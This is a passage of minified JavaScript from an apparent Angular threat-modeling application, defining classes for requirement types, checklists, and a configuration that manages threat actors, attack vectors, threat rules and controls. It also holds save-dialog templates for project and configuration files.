this.Data.subReqTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}get RequiredPerLevel(){return this.Data.RequiredPerLevel}set RequiredPerLevel(a){this.Data.RequiredPerLevel=a}get ReqFulfillRule(){return this.Data.ReqFulfillRule}set ReqFulfillRule(a){this.Data.ReqFulfillRule=a}EvalRequirement(a){if(this.ReqFulfillRule.RuleType==Xg.SWComponent&&this.ReqFulfillRule.SWRule.ComponentTypeID&&this.ReqFulfillRule.SWRule.PropertyRest.ID){let e=a.SoftwareStack.GetChildrenFlat().find(i=>i.Type.ID==this.ReqFulfillRule.SWRule.ComponentTypeID);if(e){const i=RT.EvalProp(this.ReqFulfillRule.SWRule.PropertyRest,e),n=new Array(this.RequiredPerLevel.length).fill(!1);if(i)for(let r=0;r<this.RequiredPerLevel.length;r++)n[r]=this.RequiredPerLevel[r];return n}}return null}AddSubRequirementType(a){this.SubReqTypes.includes(a)||this.Data.subReqTypeIDs.push(a.ID)}RemoveSubRequirementType(a){this.SubReqTypes.includes(a)&&this.Data.subReqTypeIDs.splice(this.Data.subReqTypeIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubReqTypes.forEach(n=>i.push({Type:li.DeleteRequirementType,Param:n})),e.GetChecklistTypes().filter(n=>n.RequirementTypes.find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklistType,Param:n})),null==a||a.GetChecklists().filter(n=>n.Type.GetRequirementTypesFlat().find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklist,Param:n})),i}OnDelete(a,e){let i=e.GetRequirementTypes().find(r=>r.SubReqTypes.some(c=>c.ID==this.ID));i&&i.RemoveSubRequirementType(this),this.FindReferences(a,e).forEach(r=>{if(r.Type==li.DeleteRequirementType)e.DeleteRequirementType(r.Param);else if(r.Type==li.RemoveRequirementTypeFromChecklistType)r.Param.RemoveRequirementType(this);else if(r.Type==li.RemoveRequirementTypeFromChecklist){const c=r.Param.RequirementValues.findIndex(d=>d.RequirementTypeID==this.ID);c>=0&&r.Param.RequirementValues.splice(c,1)}})}static FromJSON(a,e){return new Yg(a,e)}}class Jg extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Levels&&(this.Levels=[]),this.Data.requirementTypeIDs||(this.Data.requirementTypeIDs=[])}get Levels(){return this.Data.Levels}set Levels(a){this.Data.Levels=a}get RequirementTypes(){let a=[];return this.Data.requirementTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}AddRequirementType(a){this.RequirementTypes.includes(a)||this.Data.requirementTypeIDs.push(a.ID)}RemoveRequirementType(a){this.RequirementTypes.includes(a)&&this.Data.requirementTypeIDs.splice(this.Data.requirementTypeIDs.indexOf(a.ID),1)}GetRequirementTypesFlat(){let a=[],e=i=>{i.forEach(n=>{a.push(n),e(n.SubReqTypes)})};return e(this.RequirementTypes),a}FindReferences(a,e){let i=[];return null==a||a.GetChecklists().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteChecklist,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e);this.RequirementTypes.forEach(n=>e.DeleteRequirementType(n)),i.forEach(n=>{n.Type==li.DeleteChecklist&&a.DeleteChecklist(n.Param)})}static FromJSON(a,e){return new Jg(a,e)}}class CM extends Ln{constructor(a,e,i,n){super(a),this.config=n,this.project=i,this.Type=e,this.Data.RequirementValues||(this.Data.RequirementValues=[])}get Type(){return this.config.GetChecklistType(this.Data.typeID)}set Type(a){this.Data.typeID=null==a?void 0:a.ID}get RequirementValues(){return this.Data.RequirementValues}set RequirementValues(a){this.Data.RequirementValues=a}FindReferences(a,e){return[]}OnDelete(a,e){let i=a.GetDevices().find(n=>n.Checklists.includes(this));i&&i.RemoveChecklist(this)}static FromJSON(a,e,i){return new CM(a,i.GetChecklistType(a.typeID),e,i)}}class Wu extends Ln{constructor(a){if(super(a),this.assetGroups=[],this.myData=[],this.stencilTypeMap=new Map,this.stencilTypeTemplates=[],this.stencilThreatMnemonics=[],this.protocolMap=new Map,this.myComponentSWTypeMap=new Map,this.myComponentSWTypeGroups=[],this.myComponentPTypeMap=new Map,this.myComponentPTypeGroups=[],this.threatActors=[],this.threatCategoryGroups=[],this.threatCategoryMap=new Map,this.attackVectorGroups=[],this.attackVectorMap=new Map,this.threatQuestionMap=new Map,this.threatRuleGroups=[],this.threatRuleMap=new Map,this.controlGroups=[],this.controlMap=new Map,this.requirementTypes=[],this.checklistTypes=[],this.FileChanged=!1,this.Data.Name||(this.Data.Name="New Configuration"),this.Data.Version||(this.Data.Version=D5.ConfigVersion),!this.Data.threatLibraryID){let e=this.CreateAttackVectorGroup(null);e.Name="Threat Library",this.Data.threatLibraryID=e.ID}if(!this.Data.DFDthreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="CPDFD Rules",e.RuleType=on.DFD,this.Data.DFDthreatRuleGroupsID=e.ID}if(!this.Data.stencilThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Stencil Rules",e.RuleType=on.Stencil,this.Data.stencilThreatRuleGroupsID=e.ID}if(!this.Data.componentThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Component Rules",e.RuleType=on.Component,this.Data.componentThreatRuleGroupsID=e.ID}if(!this.Data.assetGroupID){let e=this.CreateAssetGroup(null);e.Name="Asset Groups",this.Data.assetGroupID=e.ID}if(!this.Data.controlLibraryID){let e=this.CreateControlGroup(null);e.Name="Controls",this.Data.controlLibraryID=e.ID}}get Version(){return this.Data.Version}get AssetGroups(){return this.GetAssetGroup(this.Data.assetGroupID)}get ThreatLibrary(){return this.GetAttackVectorGroup(this.Data.threatLibraryID)}get DFDThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.DFDthreatRuleGroupsID)}get StencilThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.stencilThreatRuleGroupsID)}get ComponentThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.componentThreatRuleGroupsID)}get ControlLibrary(){return this.GetControlGroup(this.Data.controlLibraryID)}GetAssetGroups(){return this.assetGroups}GetMyDatas(){return this.myData}GetStencilTypes(){return Array.from(this.stencilTypeMap,([a,e])=>e)}GetStencilTypeTemplates(){return this.stencilTypeTemplates}GetStencilThreatMnemonics(){return this.stencilThreatMnemonics}GetProtocols(){return Array.from(this.protocolMap,([a,e])=>e)}GetMyComponentTypes(a){return a==zr.Software?this.GetMyComponentSWTypes():this.GetMyComponentPTypes()}GetMyComponentSWTypes(){return Array.from(this.myComponentSWTypeMap,([a,e])=>e)}GetMyComponentSWTypeGroups(){return this.myComponentSWTypeGroups}GetMyComponentTypeGroups(a){return a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups}GetMyComponentPTypes(){return Array.from(this.myComponentPTypeMap,([a,e])=>e)}GetMyComponentPTypeGroups(){return this.myComponentPTypeGroups}GetThreatActors(){return this.threatActors}GetThreatCategoryGroups(){return this.threatCategoryGroups}GetThreatCategories(){return Array.from(this.threatCategoryMap,([a,e])=>e)}GetAttackVectorGroups(){return this.attackVectorGroups}GetAttackVectors(){return Array.from(this.attackVectorMap,([a,e])=>e)}GetThreatQuestions(){return Array.from(this.threatQuestionMap,([a,e])=>e)}GetThreatRuleGroups(){return this.threatRuleGroups}GetThreatRules(){return Array.from(this.threatRuleMap,([a,e])=>e)}GetControlGroups(){return this.controlGroups}GetControls(){return Array.from(this.controlMap,([a,e])=>e)}GetRequirementTypes(){return this.requirementTypes}GetChecklistTypes(){return this.checklistTypes}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},null,this);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.assetGroups.splice(e,1)),e>=0}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},null,this);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.myData.splice(e,1)),e>=0}GetStencilType(a){return this.stencilTypeMap.get(a)}CreateStencilType(a){let e=new oM({},this);return e.ElementTypeID=a,e.Name=Sc.Constructor(a).GetDefaultType(this).Name,this.stencilTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName(e.Name,this.GetStencilTypes().map(i=>i.Name)),e}DeleteStencilType(a){return!!this.stencilTypeMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}GetStencilElementType(a){return a?this.GetStencilTypes().find(e=>e.IsDefault&&e.ElementTypeID==a.ElementTypeID):null}GetAllStencilProperties(a){if(!a)return null;let e=[];return a.Properties&&e.push(...a.Properties),!a.IsDefault&&this.GetStencilElementType(a).Properties&&e.push(...this.GetStencilElementType(a).Properties),a.ElementTypeID==Et.DataFlow&&e.push(...Lu.GetDefaultType(this).Properties),e}MoveItemInStencilTypes(a,e){this.moveItemInMap("stencilTypeMap",a,e)}GetStencilTypeTemplate(a){return this.stencilTypeTemplates.find(e=>e.ID==a)}CreateStencilTypeTemplate(){let a=new rM({},this);return this.stencilTypeTemplates.push(a),a.Name=Gi.FindUniqueName("Template",this.GetStencilTypeTemplates().map(e=>e.Name)),a}DeleteStencilTypeTemplate(a){const e=this.stencilTypeTemplates.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeTemplates.splice(e,1)),e>=0}GetStencilThreatMnemonic(a){return this.stencilThreatMnemonics.find(e=>e.ID==a)}CreateStencilThreatMnemonic(){let a=new sM({},this);return this.stencilThreatMnemonics.push(a),a.Name=Gi.FindUniqueName("Mnemonic",this.GetStencilThreatMnemonics().map(e=>e.Name)),a}DeleteStencilThreatMnemonic(a){const e=this.stencilThreatMnemonics.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilThreatMnemonics.splice(e,1)),e>=0}GetProtocol(a){return this.protocolMap.get(a)}CreateProtocol(){let a=new Lu({},this);return this.protocolMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Protocol",this.GetProtocols().map(e=>e.Name)),a}DeleteProtocol(a){return!!this.protocolMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.protocolMap.delete(a.ID),!0)}MoveItemInProtocols(a,e){this.moveItemInMap("protocolMap",a,e)}GetMyComponentTypeGroup(a){let e=this.myComponentSWTypeGroups.find(i=>i.ID==a);return e||(e=this.myComponentPTypeGroups.find(i=>i.ID==a)),e}CreateMyComponentTypeGroup(a){let e=new Xb({},this);e.ComponentTypeID=a;let i=a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;return e.Name=Gi.FindUniqueName("Component Type Group",i.map(n=>n.Name)),i.push(e),e}DeleteMyComponentTypeGroup(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;const i=e.indexOf(a);return i>=0&&(a.OnDelete(this.ProjectFile,this),e.splice(i,1)),i>=0}GetMyComponentType(a){return this.myComponentSWTypeMap.has(a)?this.myComponentSWTypeMap.get(a):this.myComponentPTypeMap.has(a)?this.myComponentPTypeMap.get(a):void 0}CreateMyComponentType(a){let e=new Kb({},this);return a.AddMyComponentType(e),e.ComponentTypeID=a.ComponentTypeID,a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap.set(e.ID,e):this.myComponentPTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Component Type",this.GetMyComponentTypes(a.ComponentTypeID).map(i=>i.Name)),e}DeleteMyComponentType(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap:this.myComponentPTypeMap;return!!e.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),e.delete(a.ID),!0)}FindGroupOfMyComponent(a){return a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID)):this.myComponentPTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID))}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){let a=new Gp({},null,this);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=dr.Medium,this.threatActors.push(a),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&this.threatActors.splice(e,1),e>=0}GetThreatCategory(a){return this.threatCategoryMap.get(a)}CreateThreatCategory(){let a=new Jb({},this);return this.threatCategoryMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Threat Category",this.GetThreatCategories().map(e=>e.Name)),a}DeleteThreatCategory(a){return!!this.threatCategoryMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}FindGroupOfThreatCategory(a){return this.threatCategoryGroups.find(e=>e.ThreatCategories.some(i=>i.ID==a.ID))}GetThreatCategoryGroup(a){return this.threatCategoryGroups.find(e=>e.ID==a)}CreateThreatCategoryGroup(){let a=new Zb({},this);return this.threatCategoryGroups.push(a),a.Name=Gi.FindUniqueName("Group",this.GetThreatCategoryGroups().map(e=>e.Name)),a}DeleteThreatCategoryGroup(a){const e=this.threatCategoryGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatCategoryGroups.splice(e,1)),e>=0}GetAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.ID==a)}CreateAttackVectorGroup(a){let e=new tM({},this);return this.attackVectorGroups.push(e),e.Name=Gi.FindUniqueName("Attack Vector Group",this.attackVectorGroups.map(i=>i.Name)),null!=a&&a.AddAttackVectorGroup(e),e}DeleteAttackVectorGroup(a){const e=this.attackVectorGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.attackVectorGroups.splice(e,1)),e>=0}FindGroupOfAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetAttackVector(a){return this.attackVectorMap.get(a)}CreateAttackVector(a){let e=new zp({},this);return a&&a.AddAttackVector(e),this.attackVectorMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Attack Vector",this.GetAttackVectors().map(i=>i.Name)),e}DeleteAttackVector(a){return!!this.attackVectorMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.attackVectorMap.delete(a.ID),!0)}FindGroupOfAttackVector(a){return this.attackVectorGroups.find(e=>e.AttackVectors.some(i=>i.ID==a.ID))}GetThreatQuestion(a){return this.threatQuestionMap.get(a)}CreateThreatQuestion(){let a=new iM({},this);return this.threatQuestionMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Question",this.GetThreatQuestions().map(e=>e.Name)),a}DeleteThreatQuestion(a){return!!this.threatQuestionMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatQuestionMap.delete(a.ID),!0)}MoveItemInThreatQuestions(a,e){this.moveItemInMap("threatQuestionMap",a,e)}GetThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.ID==a)}CreateThreatRuleGroup(a){let e=new aM({},this);return this.threatRuleGroups.push(e),e.Name=Gi.FindUniqueName("Threat Rule Group",this.threatRuleGroups.map(i=>i.Name)),null!=a&&a.AddThreatRuleGroup(e),e}DeleteThreatRuleGroup(a){const e=this.threatRuleGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatRuleGroups.splice(e,1)),e>=0}FindGroupOfThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetThreatRule(a){return this.threatRuleMap.get(a)}CreateThreatRule(a,e){let i=new Fp({},this);return i.RuleType=e,a&&a.AddThreatRule(i),this.threatRuleMap.set(i.ID,i),i.Name=Gi.FindUniqueName("Threat Rule",this.GetThreatRules().map(n=>n.Name)),i}DeleteThreatRule(a){return!!this.threatRuleMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatRuleMap.delete(a.ID),!0)}FindGroupOfThreatRule(a){return this.threatRuleGroups.find(e=>e.ThreatRules.some(i=>i.ID==a.ID))}MoveItemInThreatRules(a,e){this.moveItemInMap("threatRuleMap",a,e)}GetControl(a){return this.controlMap.get(a)}CreateControl(a){let e=new Wg({},this);return a&&a.AddControl(e),this.controlMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Control",this.GetControls().map(i=>i.Name)),e}DeleteControl(a){return!!this.controlMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.controlMap.delete(a.ID),!0)}FindGroupOfControl(a){return this.controlGroups.find(e=>e.Controls.some(i=>i.ID==a.ID))}GetControlGroup(a){return this.controlGroups.find(e=>e.ID==a)}CreateControlGroup(a){let e=new Yb({},this);return this.controlGroups.push(e),e.Name=Gi.FindUniqueName("Control Group",this.controlGroups.map(i=>i.Name)),null!=a&&a.AddControlGroup(e),e}DeleteControlGroup(a){const e=this.controlGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.controlGroups.splice(e,1)),e>=0}FindGroupOfControlGroup(a){return this.ControlLibrary.SubGroups.includes(a)?this.ControlLibrary:this.controlGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetRequirementType(a){return this.requirementTypes.find(e=>e.ID==a)}CreateRequirementType(){let a=new Yg({},this);return this.requirementTypes.push(a),a.Name=Gi.FindUniqueName("Requirement",this.GetRequirementTypes().map(e=>e.Name)),a}DeleteRequirementType(a){const e=this.requirementTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.requirementTypes.splice(e,1)),e>=0}GetChecklistType(a){return this.checklistTypes.find(e=>e.ID==a)}CreateChecklistType(){let a=new Jg({},this);return this.checklistTypes.push(a),a.Name=Gi.FindUniqueName("Checklist",this.GetChecklistTypes().map(e=>e.Name)),a}DeleteChecklistType(a){const e=this.checklistTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.checklistTypes.splice(e,1)),e>=0}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){let a={Data:this.Data,assetGroups:[],myData:[],stencilTypes:[],stencilTypeTemplates:[],stencilThreatMnemonics:[],protocols:[],myComponentSWTypes:[],myComponentSWTypeGroups:[],myComponentPTypes:[],myComponentPTypeGroups:[],threatActors:[],threatCategoryGroups:[],threatCategories:[],attackVectorGroups:[],attackVectors:[],threatQuestions:[],threatRuleGroups:[],threatRules:[],controls:[],controlGroups:[],requirementTypes:[],checklistTypes:[]};return this.assetGroups.forEach(e=>a.assetGroups.push(e.ToJSON())),this.myData.forEach(e=>a.myData.push(e.ToJSON())),this.stencilTypeMap.forEach(e=>a.stencilTypes.push(e.ToJSON())),this.stencilTypeTemplates.forEach(e=>a.stencilTypeTemplates.push(e.ToJSON())),this.stencilThreatMnemonics.forEach(e=>a.stencilThreatMnemonics.push(e.ToJSON())),this.protocolMap.forEach(e=>a.protocols.push(e.ToJSON())),this.myComponentSWTypeMap.forEach(e=>a.myComponentSWTypes.push(e.ToJSON())),this.myComponentSWTypeGroups.forEach(e=>a.myComponentSWTypeGroups.push(e.ToJSON())),this.myComponentPTypeMap.forEach(e=>a.myComponentPTypes.push(e.ToJSON())),this.myComponentPTypeGroups.forEach(e=>a.myComponentPTypeGroups.push(e.ToJSON())),this.threatActors.forEach(e=>a.threatActors.push(e.ToJSON())),this.threatCategoryGroups.forEach(e=>a.threatCategoryGroups.push(e.ToJSON())),this.threatCategoryMap.forEach(e=>a.threatCategories.push(e.ToJSON())),this.attackVectorGroups.forEach(e=>a.attackVectorGroups.push(e.ToJSON())),this.attackVectorMap.forEach(e=>a.attackVectors.push(e.ToJSON())),this.threatQuestionMap.forEach(e=>a.threatQuestions.push(e.ToJSON())),this.threatRuleGroups.forEach(e=>a.threatRuleGroups.push(e.ToJSON())),this.threatRuleMap.forEach(e=>a.threatRules.push(e.ToJSON())),this.controlGroups.forEach(e=>a.controlGroups.push(e.ToJSON())),this.controlMap.forEach(e=>a.controls.push(e.ToJSON())),this.requirementTypes.forEach(e=>a.requirementTypes.push(e.ToJSON())),this.checklistTypes.forEach(e=>a.checklistTypes.push(e.ToJSON())),a}static FromJSON(a){var e,i,n,r,c,d;const T=new Wu(a.Data);return a.assetGroups.forEach(k=>T.assetGroups.push(Zl.FromJSON(k,null,T))),a.myData.forEach(k=>T.myData.push(Pu.FromJSON(k,null,T))),a.stencilTypes.forEach(k=>T.stencilTypeMap.set(k.ID,oM.FromJSON(k,T))),a.stencilTypeTemplates.forEach(k=>T.stencilTypeTemplates.push(rM.FromJSON(k,T))),null===(e=a.stencilThreatMnemonics)||void 0===e||e.forEach(k=>T.stencilThreatMnemonics.push(sM.FromJSON(k,T))),a.protocols.forEach(k=>T.protocolMap.set(k.ID,Lu.FromJSON(k,T))),a.myComponentSWTypes.forEach(k=>T.myComponentSWTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentSWTypeGroups.forEach(k=>T.myComponentSWTypeGroups.push(Xb.FromJSON(k,T))),a.myComponentPTypes.forEach(k=>T.myComponentPTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentPTypeGroups.forEach(k=>T.myComponentPTypeGroups.push(Xb.FromJSON(k,T))),null===(i=a.threatActors)||void 0===i||i.forEach(k=>T.threatActors.push(Gp.FromJSON(k,null,T))),a.threatCategories.forEach(k=>T.threatCategoryMap.set(k.ID,Jb.FromJSON(k,T))),a.threatCategoryGroups.forEach(k=>T.threatCategoryGroups.push(Zb.FromJSON(k,T))),a.attackVectorGroups.forEach(k=>T.attackVectorGroups.push(tM.FromJSON(k,T))),a.attackVectors.forEach(k=>T.attackVectorMap.set(k.ID,zp.FromJSON(k,T))),a.threatQuestions.forEach(k=>T.threatQuestionMap.set(k.ID,iM.FromJSON(k,T))),a.threatRuleGroups.forEach(k=>T.threatRuleGroups.push(aM.FromJSON(k,T))),a.threatRules.forEach(k=>T.threatRuleMap.set(k.ID,Fp.FromJSON(k,T))),null===(n=a.controlGroups)||void 0===n||n.forEach(k=>T.controlGroups.push(Yb.FromJSON(k,T))),null===(r=a.controls)||void 0===r||r.forEach(k=>T.controlMap.set(k.ID,Wg.FromJSON(k,T))),null===(c=a.requirementTypes)||void 0===c||c.forEach(k=>T.requirementTypes.push(Yg.FromJSON(k,T))),null===(d=a.checklistTypes)||void 0===d||d.forEach(k=>T.checklistTypes.push(Jg.FromJSON(k,T))),T.FileChanged=!1,T}static DefaultFile(){return Wu.FromJSON(JSON.parse(JSON.stringify(gwe)))}}function eOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.id),C(1),ke(e.name)}}function tOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n      "),u())}function iOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        A project "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n      "),u())}function aOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.Key),C(1),ke(e.Value)}}function nOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n      "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newProject.repoId=n)}),s(8,"\n        "),ne(9,eOe,2,2,"mat-option",12),s(10,"\n      "),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"mat-form-field"),s(14,"\n      "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n      "),it(19,"input",13),s(20,"\n      "),m(21,"span",14),s(22,".ttmp"),u(),s(23,"\n      "),ne(24,tOe,5,0,"mat-error",2),s(25,"\n      "),ne(26,iOe,5,0,"mat-error",2),s(27,"\n    "),u(),s(28,"\n    "),m(29,"mat-form-field",3),s(30,"\n      "),m(31,"mat-label"),s(32,"Configuration"),u(),s(33,"\n      "),m(34,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newProject.configFile=n)}),s(35,"\n        "),ne(36,aOe,2,2,"mat-option",12),s(37,"\n      "),u(),s(38,"\n    "),u(),s(39,"\n  "),Mt()}if(2&t){const e=B();C(7),V("value",e.data.newProject.repoId),C(2),V("ngForOf",e.Repos),C(7),ke(re(17,9,"general.Name")),C(3),V("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),C(5),V("ngIf",e.nameFormControl.hasError("required")),C(2),V("ngIf",e.nameFormControl.hasError("forbiddenName")),C(8),V("value",e.data.newProject.configFile),C(2),V("ngForOf",e.Configs)}}function oOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.id),C(1),ke(e.name)}}function rOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n      "),u())}function sOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        A configuration "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n      "),u())}function cOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n      "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newConfig.repoId=n)}),s(8,"\n        "),ne(9,oOe,2,2,"mat-option",12),s(10,"\n      "),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"mat-form-field"),s(14,"\n      "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n      "),it(19,"input",16),s(20,"\n      "),m(21,"span",14),s(22,".ttmc"),u(),s(23,"\n      "),ne(24,rOe,5,0,"mat-error",2),s(25,"\n      "),ne(26,sOe,5,0,"mat-error",2),s(27,"\n    "),u(),s(28,"\n  "),Mt()}if(2&t){const e=B();C(7),V("value",e.data.newConfig.repoId),C(2),V("ngForOf",e.Repos),C(7),ke(re(17,8,"general.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),C(5),V("ngIf",e.nameFormControl.hasError("required")),C(2),V("ngIf",e.nameFormControl.hasError("forbiddenName"))}}function lOe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",17),he("ngModelChange",function(n){return be(e),Me(B().data.removePW=n)}),s(1),oe(2,"translate"),u()}2&t&&(V("ngModel",B().data.removePW),C(1),ke(re(2,2,"dialog.save.removePW")))}function dOe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",3),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",18),he("ngModelChange",function(n){return be(e),Me(B().data.pw=n)})("keydown.enter",function(){return be(e),Me(B().dialogRef.close(!0))}),u(),s(7,"\n    "),m(8,"mat-icon",19),he("click",function(){be(e);const n=B();return Me(n.show=!n.show)}),s(9),u(),s(10,"\n    "),m(11,"mat-icon",20),oe(12,"translate"),s(13,"privacy_tip"),u(),s(14,"\n  "),u()}if(2&t){const e=B();C(3),ke(re(4,5,"dialog.save.addPW")),C(3),V("type",e.show?"text":"password")("ngModel",e.data.pw),C(3),ke(e.show?"visibility_off":"visibility"),C(2),at("matTooltip",re(12,7,"dialog.save.security"))}}function mOe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){return be(e),Me(B().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(V("disabled",!B().canSave)("mat-dialog-close",!0),C(1),ke(re(2,3,"general.Save")))}function uOe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(V("disabled",!B().canSave)("mat-dialog-close",!0),C(1),ke(re(2,3,"general.Save")))}class hOe{isErrorState(a,e){return!!(a&&a.invalid&&(a.dirty||a.touched||e&&e.submitted))}}function fOe(t){return a=>{let e=t.includes(a.value+".ttmp");return e||(e=t.includes(a.value+".ttmc")),e?{forbiddenName:{value:a.value}}:null}}let jG=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.dataService=n,this.nameFormControl=new lu("",[Td.required,fOe([...this.dataService.AvailableGHProjects.map(r=>r.name),...this.dataService.AvailableGHConfigs.map(r=>r.name)])]),this.matcher=new hOe,this.show=!1}get canSave(){return!("newProject"in this.data&&(null==this.data.newProject.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName"))||"newConfig"in this.data&&(null==this.data.newConfig.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName")))}get Configs(){return this.configs||(this.configs=[{Key:null,Value:"Default Configuration"}],this.dataService.AvailableGHConfigs.forEach(e=>{this.configs.push({Key:e,Value:e.name})})),this.configs}get Repos(){return this.dataService.Repos.filter(e=>e.isWritable)}ngOnInit(){}onSave(){"newProject"in this.data?(this.data.newProject.name=this.nameFormControl.value+".ttmp",this.data.newProject.path="projects/"+this.nameFormControl.value+".ttmp"):"newConfig"in this.data&&(this.data.newConfig.name=this.nameFormControl.value+".ttmc",this.data.newConfig.path="configs/"+this.nameFormControl.value+".ttmc")}}return t.\u0275fac=function(e){return 